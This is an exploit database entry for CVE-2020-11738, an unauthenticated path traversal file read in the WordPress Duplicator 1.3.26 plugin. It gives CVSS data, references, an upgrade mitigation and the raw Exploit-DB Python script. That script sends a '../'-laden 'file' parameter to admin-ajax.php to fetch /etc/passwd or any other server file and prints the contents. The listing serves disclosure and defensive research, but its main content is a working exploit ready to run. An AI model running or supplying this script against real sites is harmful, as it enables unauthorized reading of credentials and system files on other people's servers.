Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read

vendor:

Duplicator

by:

nam3lum

7.5

CVSS

HIGH

Arbitrary File Read

CWE

Product Name: Duplicator

Affected Version From: 1.3.26

Affected Version To: 1.3.26

Patch Exists: YES

Related CWE: CVE-2020-11738

CPE: a:wordpress:duplicator:1.3.26

Metasploit:

Other Scripts:

Tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild, https://snapcreek.com/duplicator/docs/changelog/?lite, https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/, http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html, https://nvd.nist.gov/vuln/detail/CVE-2020-11738

Nuclei Metadata: {'max-request': 2, 'framework': 'wordpress', 'vendor': 'snapcreek', 'product': 'duplicator'}

Platforms Tested: Ubuntu 16.04

2021

WordPress Plugin Duplicator 1.3.26 – Unauthenticated Arbitrary File Read

This exploit allows an unauthenticated attacker to read arbitrary files on the server by exploiting a vulnerability in the Wordpress Plugin Duplicator version 1.3.26. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'duplicator_download' action of the 'admin-ajax.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script, which will allow the attacker to read arbitrary files on the server.

Mitigation:

Upgrade to the latest version of the Wordpress Plugin Duplicator.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738

import requests as re
import sys

if len(sys.argv) != 3:
        print("Exploit made by nam3lum.")
        print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
        exit()

arg = sys.argv[1]
file = sys.argv[2]

URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file

output = re.get(url = URL)
print(output.text)